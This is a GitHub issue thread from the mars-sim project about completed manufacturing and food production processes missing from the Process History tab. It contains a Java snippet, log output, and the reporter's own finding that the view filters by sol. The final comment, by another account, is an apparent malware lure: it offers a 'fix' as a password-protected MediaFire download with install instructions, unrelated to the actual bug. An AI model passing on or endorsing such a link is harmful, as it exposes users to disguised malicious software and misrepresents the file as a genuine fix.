### ISSUE TITLE
Unable to display completed processes

### ISSUE THREAD

**Issue by mokun** [mars-sim/mars-sim#1396]
**Describe the bug**
- On sol 15, the Process History tab in a settlement unit window displays only one completed process and nothing else. This is unlikely.

**Expected and unexpected behavior**
- The History class is supposed to capture all completed processes.

**Discuss any potential problems you have and have not ruled out**
- Need to check if food production or manufacturing processes were being *overridden*, thus unable to start new ones.
- Need to check if JHistoryPanel causes HistoryPanel in TabPanelProcessHistory to have display problems.
- Need to check if Settlement's recordProcess() can capture a completed process without issue.

**Java classes involved**
- TabPanelProcessHistory, JHistoryPanel, HistoryPanel, Settlement's recordProcess()

In Settlement,
```java
	/**
	 * Records a completed process.
	 * 
	 * @param name Name of the process
	 * @param type Type of process
	 * @param locn On what building it was completed
	 * @param products The outputs produced
	 */
    public void recordProcess(ProcessInfo process, String type, Building locn) {
        var ph = new CompletedProcess(process, type, locn.getName());
		processHistory.add(ph);
    }
	
    /**
     * Returns the process history.
     * 
     * @return
     */
	public History<CompletedProcess> getProcessHistory() {
		return processHistory;
	}

```

**Screenshots**
- The *Press Sesame Oil...* manufacturing process occurred on sol 1. No other processes have been reported taken place in Lander Hab 1
![image](https://github.com/user-attachments/assets/86aea15a-20e8-4c29-ac95-9f84934ec87c)

**Specifications**
- post-3.8.0

**Additional context**
- The History class may be expanded to store a process queue, as espoused in [here](https://github.com/mars-sim/mars-sim/issues/1236).

**Comment by mokun** [comment]
@bevans2000 

In another session, I manually started *Weave fiberglass cloth* manu process. 
![image](https://github.com/user-attachments/assets/7eb81350-03d1-4b5e-8575-212fa60ad695)

After it was finished, I go back to the Process History tab. That manu process has been finished but it was not being captured there at all.
![image](https://github.com/user-attachments/assets/310b2617-8b10-45de-9254-815ec38d89b7)

**Comment by mokun** [comment]
Btw, here's the log: 

```
01-Adir-01:114.386 (Info) FoodProduction : [Hera] Lander Hab 1 - Ending food production process: Press Sesame Oil from Sesame Seeds
...
01-Adir-03:207.488 (Info) Manufacture [x2] : [Hera] Lander Hab 1 - Ending manufacturing process: Weave fiberglass cloth
...
01-Adir-03:366.436 (Info) FoodProduction [x2] : [Hera] Lander Hab 1 - Ending food production process: Press Sesame Oil from Sesame Seeds
...
01-Adir-03:740.803 (Info) FoodProduction [x2] : [Hera] Lander Hab 1 - Ending food production process: Press Sesame Oil from Sesame Seeds
...
01-Adir-03:207.488 (Info) Manufacture [x2] : [Hera] Lander Hab 1 - Ending manufacturing process: Weave fiberglass cloth
...
01-Adir-03:909.879 (Info) FoodProduction : [Hera] Lander Hab 1 - Ending food production process: Press Sesame Oil from Sesame Seeds
```

The *Weave fiberglass cloth* was reportedly done in stacktrace.

It also begs the question why so many *Press Sesame Oil from Sesame Seeds* processes starting and nothing else ?

**Comment by mokun** [comment]
I see why now. 

If I click on the Mars Time combo box, I can switch to another sol and see the completed manu process.

Now, it's just the matter of fine-tuning the on-demand aspects of the food production and manufacturing processes.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
